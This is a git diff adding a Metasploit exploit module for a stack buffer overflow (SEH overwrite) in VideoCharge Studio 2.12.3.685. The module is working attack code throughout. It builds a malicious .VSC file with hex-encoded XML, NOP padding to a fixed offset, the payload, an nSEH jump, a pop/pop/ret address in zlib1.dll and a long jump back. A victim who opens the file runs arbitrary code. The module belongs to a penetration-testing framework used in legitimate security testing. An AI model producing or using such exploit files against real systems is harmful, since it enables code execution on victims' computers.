diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb new file mode 100644 index 0000000000..6204fa1843 --- /dev/null +++ b/modules/exploits/windows/fileformat/videocharge_studio.rb @@ -0,0 +1,92 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'VideoCharge Studio 2.12.3.685 Buffer Overflow (SEH)', + 'Description' => %q{ + This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when + processing a specially crafted .VSC file. This vulnerability could be + exploited by a remote attacker to execute arbitrary code on the target + machine by enticing a user of VideoCharge Studio to open a malicious .VSC file. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'metacom', # Original discovery + 'Andrew Smith', # MSF Module + ], + 'References' => + [ + [ 'OSVDB', '69616' ], + [ 'CVE', '' ], + [ 'EBD', '29234' ] + ], + 'DefaultOptions' => + { + 'ExitFunction' => 'process', + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d\x3c\x22\x26", + 'DisableNops' => true, + }, + + 'Targets' => + [ + [ 'VideoCharge Studio 2.12.3.685', + { + 'Ret' => 0x61B811F1, #p/p/r | zlib1.dll + 'Offset' => 824 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Oct 27 2013', + 'DefaultTarget' => 0)) + + register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class) + + end + + def exploit + + buffer = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22" + buffer << "\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32" + buffer << "\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D\x22\x32\x2E" + buffer << "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D" + buffer << "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61" + buffer << "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x0A\x3C\x50\x72\x6F\x70" + buffer << "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E\x0A" + buffer << "\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x46\x6F\x72\x6D\x61\x74\x73\x22" + buffer << "\x3E\x0A\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74" + buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22" + buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22" + buffer << make_nops(target['Offset']-payload.encoded.length) + buffer << payload.encoded + buffer << "\xeb\x06\x90\x90" #nseh negative jump + buffer << [target.ret].pack("V") + buffer << "\xe9\x3f\xfd\xff\xff" #long jump + buffer << "\x22\x2F\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F" + buffer << "\x63\x6F\x6C\x73\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x52\x6F" + buffer << "\x6D\x61\x6E\x69\x61\x20\x53\x65\x63\x75\x72\x69\x74\x79\x20\x54\x65\x61\x6D\x22\x2F" + buffer << "\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6C" + buffer << "\x73\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E" + + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(buffer) + + end +end +